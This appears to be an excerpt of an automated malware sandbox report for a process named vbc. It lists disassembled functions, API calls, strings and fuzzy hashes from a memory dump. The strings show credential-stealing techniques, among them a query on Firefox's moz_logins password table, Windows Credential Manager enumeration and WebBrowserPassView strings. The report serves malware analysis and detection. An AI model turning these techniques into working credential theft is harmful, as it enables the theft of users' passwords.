                                                                                                                                                    Function 0040E191 Relevance: 21.1, APIs: 7, Strings: 7, Instructions: 70COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _wcsicmp
                                                                                                                                                    • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                                                                                                    • API String ID: 2081463915-1959339147
                                                                                                                                                    • Opcode ID: b616bea398b4ca2207bf7c5dde01c93d20d234ad121985eea5c1f5da2cadd933
                                                                                                                                                    • Instruction ID: 054bd0190cb9dfc881084e553ec7e2e67fad8357780775fa0482b63ba5cfd284
                                                                                                                                                    • Opcode Fuzzy Hash: b616bea398b4ca2207bf7c5dde01c93d20d234ad121985eea5c1f5da2cadd933
                                                                                                                                                    • Instruction Fuzzy Hash: 7101DE72ACA31138F83851672D17F971A598FA1B7AF70196FF514D81C6EEAC9000709D
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00410CD9 Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 44libraryloaderCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,?,0040F928), ref: 00410CE8
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00410D01
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00410D12
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00410D23
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00410D34
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 00410D45
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressProc$HandleModule
                                                                                                                                                    • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                                                                                    • API String ID: 667068680-3953557276
                                                                                                                                                    • Opcode ID: 620f7fb1875e6c1fe369c72aee23538108181ed26fa9b0cca4b6b71503556dd6
                                                                                                                                                    • Instruction ID: 16f3a03532fd71bf7b987582fee040d1dd7fa58dea07b6b8c7b27d1037cf047a
                                                                                                                                                    • Opcode Fuzzy Hash: 620f7fb1875e6c1fe369c72aee23538108181ed26fa9b0cca4b6b71503556dd6
                                                                                                                                                    • Instruction Fuzzy Hash: 92F0F474605321A9A3108BA8BD00BA72FF86781F52B10013BED00D1266DBBCD8C29F7E
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004037C3 Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 41libraryloaderCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0040383E: FreeLibrary.KERNEL32(?,004037CB,00000000,00408635,?,00000000,?), ref: 00403845
                                                                                                                                                    • LoadLibraryW.KERNEL32(advapi32.dll,00000000,00408635,?,00000000,?), ref: 004037D0
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CredReadA), ref: 004037E9
                                                                                                                                                    • GetProcAddress.KERNEL32(?,CredFree), ref: 004037F5
                                                                                                                                                    • GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00403801
                                                                                                                                                    • GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 0040380D
                                                                                                                                                    • GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00403819
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressProc$Library$FreeLoad
                                                                                                                                                    • String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
                                                                                                                                                    • API String ID: 2449869053-4258758744
                                                                                                                                                    • Opcode ID: cb87cb7b44b35881c8e04de2777173e0b76236c73d0c14512c4dcac4629ff988
                                                                                                                                                    • Instruction ID: c94656deef6b20b6b745ef32668947add9de3545ed3fb2bb9f52e7e7eb3e89f2
                                                                                                                                                    • Opcode Fuzzy Hash: cb87cb7b44b35881c8e04de2777173e0b76236c73d0c14512c4dcac4629ff988
                                                                                                                                                    • Instruction Fuzzy Hash: D9012C355007809AD730AF6AC809F06BEE4EF54B02B21886FF091A3791D7B9E240CF48
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004033DF Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 85COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00407176: wcslen.MSVCRT ref: 00407183
                                                                                                                                                      • Part of subcall function 00407176: WriteFile.KERNEL32(00000001,00000000,00000000,00000000,00000000,?,?,0040BC47,00000000,00443980,00000000,0040C656,00000000), ref: 00407192
                                                                                                                                                    • memset.MSVCRT ref: 00403415
                                                                                                                                                    • memset.MSVCRT ref: 0040342A
                                                                                                                                                    • memset.MSVCRT ref: 0040343F
                                                                                                                                                    • _snwprintf.MSVCRT ref: 00403467
                                                                                                                                                    • wcscpy.MSVCRT ref: 00403483
                                                                                                                                                    • _snwprintf.MSVCRT ref: 004034C6
                                                                                                                                                    Strings
                                                                                                                                                    • WebBrowserPassView, xrefs: 004034AB
                                                                                                                                                    • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 004033EF
                                                                                                                                                    • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 0040345A
                                                                                                                                                    • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 004034B9
                                                                                                                                                    • <table dir="rtl"><tr><td>, xrefs: 0040347D
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: memset$_snwprintf$FileWritewcscpywcslen
                                                                                                                                                    • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>$WebBrowserPassView
                                                                                                                                                    • API String ID: 2731979376-1376879643
                                                                                                                                                    • Opcode ID: f8e001787c2363cba2026e3d3c8ba2c251a00b45d532011988efd28241eb9acd
                                                                                                                                                    • Instruction ID: ae32d01ec2d3a7685ec326ba9a70c170c8059c8ae6e66fa8bd15e07dd33865c2
                                                                                                                                                    • Opcode Fuzzy Hash: f8e001787c2363cba2026e3d3c8ba2c251a00b45d532011988efd28241eb9acd
                                                                                                                                                    • Instruction Fuzzy Hash: 2E217672D002187ADB21AF55DC41FEA76BCEB08785F0040AFF509A6191DA799F848F69
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040DE35 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 153windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SetBkMode.GDI32(?,00000001), ref: 0040DE90
                                                                                                                                                    • SetTextColor.GDI32(?,00FF0000), ref: 0040DE9E
                                                                                                                                                    • SelectObject.GDI32(?,?), ref: 0040DEB3
                                                                                                                                                    • DrawTextExW.USER32(?,?,000000FF,?,00000004,?), ref: 0040DEE9
                                                                                                                                                    • SelectObject.GDI32(00000014,00000000), ref: 0040DEF3
                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0040DF0E
                                                                                                                                                    • LoadCursorW.USER32(00000000,00000067), ref: 0040DF17
                                                                                                                                                    • SetCursor.USER32(00000000), ref: 0040DF1E
                                                                                                                                                    • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 0040DF64
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CursorObjectSelectText$ColorDrawHandleLoadMessageModeModulePost
                                                                                                                                                    • String ID: WebBrowserPassView
                                                                                                                                                    • API String ID: 101102110-2171583229
                                                                                                                                                    • Opcode ID: d30b9dbd8ebc4ebaeb5335cce5274ca5fb8e94d47e078bea0be9f04dbaba8f28
                                                                                                                                                    • Instruction ID: 5844c3f8be721e5f4358c4987d475350c1bb70f51af30b4dfd416207439779ca
                                                                                                                                                    • Opcode Fuzzy Hash: d30b9dbd8ebc4ebaeb5335cce5274ca5fb8e94d47e078bea0be9f04dbaba8f28
                                                                                                                                                    • Instruction Fuzzy Hash: D451D431A00206ABDB10AFA4C845F6AB7A6BF44315F20853AF507B72E0C779AD15DB99
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040931D Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 110stringfileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,004094E9,?,?,00409553,00000000), ref: 0040933D
                                                                                                                                                      • Part of subcall function 00407BD1: SetFilePointer.KERNEL32(00409553,?,00000000,00000000,?,0040935E,00000000,00000000,?,00000020,?,004094E9,?,?,00409553,00000000), ref: 00407BDE
                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 0040936D
                                                                                                                                                      • Part of subcall function 0040928C: _memicmp.MSVCRT ref: 004092A6
                                                                                                                                                      • Part of subcall function 0040928C: memcpy.MSVCRT ref: 004092BD
                                                                                                                                                    • memcpy.MSVCRT ref: 004093B4
                                                                                                                                                    • strchr.MSVCRT ref: 004093D9
                                                                                                                                                    • strchr.MSVCRT ref: 004093EA
                                                                                                                                                    • _strlwr.MSVCRT ref: 004093F8
                                                                                                                                                    • memset.MSVCRT ref: 00409413
                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00409460
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: File$memcpystrchr$CloseCreateHandlePointerSize_memicmp_strlwrmemset
                                                                                                                                                    • String ID: 4$h
                                                                                                                                                    • API String ID: 4066021378-1856150674
                                                                                                                                                    • Opcode ID: 5c9b1e76fbe1022800f84db5655dab790c3d9ef423dba09cd133e7d04b6bc347
                                                                                                                                                    • Instruction ID: cde85974a53443ad19b2097b399cb4fe7e1f14935bf37b0ef0624c00476b394c
                                                                                                                                                    • Opcode Fuzzy Hash: 5c9b1e76fbe1022800f84db5655dab790c3d9ef423dba09cd133e7d04b6bc347
                                                                                                                                                    • Instruction Fuzzy Hash: 333186B1900118BEEB11EB54CC85BEE77ACEF04358F10406AFA08E6181D7789F558B69
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00411C63 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 99COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: memset$_snwprintf
                                                                                                                                                    • String ID: %%0.%df
                                                                                                                                                    • API String ID: 3473751417-763548558
                                                                                                                                                    • Opcode ID: 4b41fd37f03522ed39b57e73efbb1f6ad9b07295744d2b5ffc828d63613b1bc3
                                                                                                                                                    • Instruction ID: 8dc9084977ea8e099579ef4c9ca95b08d60ceca6feee4e1064a0b0e4f5e47a8f
                                                                                                                                                    • Opcode Fuzzy Hash: 4b41fd37f03522ed39b57e73efbb1f6ad9b07295744d2b5ffc828d63613b1bc3
                                                                                                                                                    • Instruction Fuzzy Hash: 79313E71800229BAEB20DF55DC85FEBBBBCFF49308F4000EAB609A2151D7749B94CB65
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00410DF5 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 82COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • wcschr.MSVCRT ref: 00410E0E
                                                                                                                                                    • wcscpy.MSVCRT ref: 00410E1E
                                                                                                                                                      • Part of subcall function 00407278: wcslen.MSVCRT ref: 00407287
                                                                                                                                                      • Part of subcall function 00407278: wcslen.MSVCRT ref: 00407291
                                                                                                                                                      • Part of subcall function 00407278: _memicmp.MSVCRT ref: 004072AC
                                                                                                                                                    • wcscpy.MSVCRT ref: 00410E6D
                                                                                                                                                    • wcscat.MSVCRT ref: 00410E78
                                                                                                                                                    • memset.MSVCRT ref: 00410E54
                                                                                                                                                      • Part of subcall function 00407723: GetWindowsDirectoryW.KERNEL32(00451698,00000104,?,00410EAD,?,?,00000000,00000208,?), ref: 00407739
                                                                                                                                                      • Part of subcall function 00407723: wcscpy.MSVCRT ref: 00407749
                                                                                                                                                    • memset.MSVCRT ref: 00410E9C
                                                                                                                                                    • memcpy.MSVCRT ref: 00410EB7
                                                                                                                                                    • wcscat.MSVCRT ref: 00410EC3
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                                                                                                                    • String ID: \systemroot
                                                                                                                                                    • API String ID: 4173585201-1821301763
                                                                                                                                                    • Opcode ID: a0bd60bd2b0e165453e177ad0a7c90215dc3e7af33d93e9088b0359243bc96d3
                                                                                                                                                    • Instruction ID: 1a8d2db1a324573a28d88b24eeb1ed9c65cf0fc221c6a4ee7099d5d8ca3d40a6
                                                                                                                                                    • Opcode Fuzzy Hash: a0bd60bd2b0e165453e177ad0a7c90215dc3e7af33d93e9088b0359243bc96d3
                                                                                                                                                    • Instruction Fuzzy Hash: B121F9B280530479E621E7628D86EEB63EC9F05754F60455FF119E2082FABCA6C58B1E
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040697E Relevance: 16.7, APIs: 10, Strings: 1, Instructions: 187stringCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00441975: memset.MSVCRT ref: 004419A0
                                                                                                                                                      • Part of subcall function 00441975: wcscpy.MSVCRT ref: 004419B7
                                                                                                                                                      • Part of subcall function 00441975: memset.MSVCRT ref: 004419EA
                                                                                                                                                      • Part of subcall function 00441975: wcscpy.MSVCRT ref: 00441A00
                                                                                                                                                      • Part of subcall function 00441975: wcscat.MSVCRT ref: 00441A11
                                                                                                                                                      • Part of subcall function 00441975: wcscpy.MSVCRT ref: 00441A37
                                                                                                                                                      • Part of subcall function 00441975: wcscat.MSVCRT ref: 00441A48
                                                                                                                                                      • Part of subcall function 00441975: wcscpy.MSVCRT ref: 00441A6F
                                                                                                                                                      • Part of subcall function 00441975: wcscat.MSVCRT ref: 00441A80
                                                                                                                                                      • Part of subcall function 00441975: GetModuleHandleW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000104,00000000), ref: 00441A8F
                                                                                                                                                      • Part of subcall function 00441975: LoadLibraryExW.KERNEL32(?,00000000,00000008,?,?,?,?,?,?,?,?,?,00000104,00000000), ref: 00441AA6
                                                                                                                                                      • Part of subcall function 00441975: GetProcAddress.KERNEL32(?,sqlite3_open), ref: 00441AF3
                                                                                                                                                      • Part of subcall function 00441975: GetProcAddress.KERNEL32(?,sqlite3_prepare), ref: 00441AFF
                                                                                                                                                    • memset.MSVCRT ref: 004069BD
                                                                                                                                                      • Part of subcall function 00407DC0: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,004028DC,?,?,00000003,00000000,00000000), ref: 00407DD9
                                                                                                                                                    • memset.MSVCRT ref: 00406A3C
                                                                                                                                                    • memset.MSVCRT ref: 00406A51
                                                                                                                                                    • strcpy.MSVCRT(?,00000000,?,00000002,?,00000005,?,00000004,?,00000007,?,00000006,?,00000001), ref: 00406AC4
                                                                                                                                                    • strcpy.MSVCRT(?,?,?,00000002,?,00000005,?,00000004,?,00000007,?,00000006,?,00000001), ref: 00406ADA
                                                                                                                                                    • strcpy.MSVCRT(?,?,?,00000002,?,00000005,?,00000004,?,00000007,?,00000006,?,00000001), ref: 00406AF0
                                                                                                                                                    • strcpy.MSVCRT(?,?,?,00000002,?,00000005,?,00000004,?,00000007,?,00000006,?,00000001), ref: 00406B06
                                                                                                                                                    • strcpy.MSVCRT(?,?,?,00000002,?,00000005,?,00000004,?,00000007,?,00000006,?,00000001), ref: 00406B1C
                                                                                                                                                    • strcpy.MSVCRT(?,?,?,00000002,?,00000005,?,00000004,?,00000007,?,00000006,?,00000001), ref: 00406B32
                                                                                                                                                    • memset.MSVCRT ref: 00406B48
                                                                                                                                                    Strings
                                                                                                                                                    • SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins, xrefs: 00406A03
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: memsetstrcpy$wcscpy$wcscat$AddressProc$ByteCharHandleLibraryLoadModuleMultiWide
                                                                                                                                                    • String ID: SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins
                                                                                                                                                    • API String ID: 2096775815-1740008135
                                                                                                                                                    • Opcode ID: 8192c0fe8ba549a976583856fdff13a2ed89254f8bdc8aa75337d2af27a32240
                                                                                                                                                    • Instruction ID: 0d09ea3875aa138d6f02baa8234f1932a31c53e7e6ecd19b10853a161b4d72d0
                                                                                                                                                    • Opcode Fuzzy Hash: 8192c0fe8ba549a976583856fdff13a2ed89254f8bdc8aa75337d2af27a32240
                                                                                                                                                    • Instruction Fuzzy Hash: 6D61E9B2C0421EEEDF11AF91DC419DEBBB8EF04314F10406BF505B2191EA79AA94CF69
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00415EAF Relevance: 16.6, APIs: 11, Instructions: 88COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00414BCA: GetVersionExW.KERNEL32(?), ref: 00414BED
                                                                                                                                                    • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 00415EDB
                                                                                                                                                    • malloc.MSVCRT ref: 00415EE6
                                                                                                                                                    • free.MSVCRT(?), ref: 00415EF6
                                                                                                                                                    • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00415F0A
                                                                                                                                                    • free.MSVCRT(?), ref: 00415F0F
                                                                                                                                                    • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 00415F25
                                                                                                                                                    • malloc.MSVCRT ref: 00415F2D
                                                                                                                                                    • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00415F40
                                                                                                                                                    • free.MSVCRT(?), ref: 00415F45
                                                                                                                                                    • free.MSVCRT(?), ref: 00415F59
                                                                                                                                                    • free.MSVCRT(00000000,0044A338,00000000), ref: 00415F78
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: free$FullNamePath$malloc$Version
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3356672799-0
                                                                                                                                                    • Opcode ID: 921d0a7259a897f213f630380232b9b221bbaa70b4d2ef9e6fc0aaee11bddb4f
                                                                                                                                                    • Instruction ID: 788494e2a8c2de429da1840323bde4c0a518de2f45811afbb62912a9d7d550b6
                                                                                                                                                    • Opcode Fuzzy Hash: 921d0a7259a897f213f630380232b9b221bbaa70b4d2ef9e6fc0aaee11bddb4f
                                                                                                                                                    • Instruction Fuzzy Hash: F321CB71900108FFEB117FA5DD46CDFBBA9DF80368B20007BF404A2160EA785F809568
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00407363 Relevance: 16.6, APIs: 11, Instructions: 59clipboardmemoryfileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • EmptyClipboard.USER32 ref: 0040736D
                                                                                                                                                      • Part of subcall function 00407144: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,004421F7,00000000,?,00000000,00000000,00410671,?,?), ref: 00407156
                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 0040738A
                                                                                                                                                    • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040739B
                                                                                                                                                    • GlobalLock.KERNEL32 ref: 004073A8
                                                                                                                                                    • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 004073BB
                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 004073CD
                                                                                                                                                    • SetClipboardData.USER32 ref: 004073D6
                                                                                                                                                    • GetLastError.KERNEL32 ref: 004073DE
                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 004073EA
                                                                                                                                                    • GetLastError.KERNEL32 ref: 004073F5
                                                                                                                                                    • CloseClipboard.USER32 ref: 004073FE
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3604893535-0
                                                                                                                                                    • Opcode ID: ff4ef1d92d1a290ea301bbc8eaca8dcb04474945f762c75d88d1861bbfd53786
                                                                                                                                                    • Instruction ID: 70226e125eefff96fe42492f97b8668800667adb6f1e94a7dd2fd5f696112ff0
                                                                                                                                                    • Opcode Fuzzy Hash: ff4ef1d92d1a290ea301bbc8eaca8dcb04474945f762c75d88d1861bbfd53786
                                                                                                                                                    • Instruction Fuzzy Hash: E311423A904204FBE7105FB5EC4DA5E7F78EB06B52F204176FD02E5290DB749A01DB69
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004121F2 Relevance: 16.6, APIs: 1, Strings: 10, Instructions: 50COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: wcscpy
                                                                                                                                                    • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                                                                                                                    • API String ID: 1284135714-318151290
                                                                                                                                                    • Opcode ID: 765507c601b4d8d2ba7194c2d8328fe19790b608763020fa3010f04483565392
                                                                                                                                                    • Instruction ID: 454bece2ea24cac32075296694d9d3cbfc4d611bf65854eebe1c10393ee0200f
                                                                                                                                                    • Opcode Fuzzy Hash: 765507c601b4d8d2ba7194c2d8328fe19790b608763020fa3010f04483565392
                                                                                                                                                    • Instruction Fuzzy Hash: 46F01D3329C746A0383D09680B06AFF1001E2127497B585D3A882E06D5C8FDCEF2F81F
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040A16C Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                                                                                                                    • String ID: 0$6
                                                                                                                                                    • API String ID: 4066108131-3849865405
                                                                                                                                                    • Opcode ID: 1d39bbd5ff858052ee02b08f17fe13160222b35be18e4d09e9b30479f4b91e1d
                                                                                                                                                    • Instruction ID: 34000a492db7a65727c4d20bf870b817f1c48c155544aae5e12c30b4e9d7c158
                                                                                                                                                    • Opcode Fuzzy Hash: 1d39bbd5ff858052ee02b08f17fe13160222b35be18e4d09e9b30479f4b91e1d
                                                                                                                                                    • Instruction Fuzzy Hash: 64318B72408340AFDB20DF91D845A9BB7E8FF84354F00497EF948A2291E37ADA14CB5B
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00403926 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 52libraryloaderwindowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,0040E305,00000000), ref: 00403945
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00403957
                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,0040E305,00000000), ref: 0040396B
                                                                                                                                                    • #17.COMCTL32(?,00000002,?,?,?,0040E305,00000000), ref: 00403979
                                                                                                                                                    • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00403996
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Library$AddressFreeLoadMessageProc
                                                                                                                                                    • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                                                                    • API String ID: 2780580303-317687271
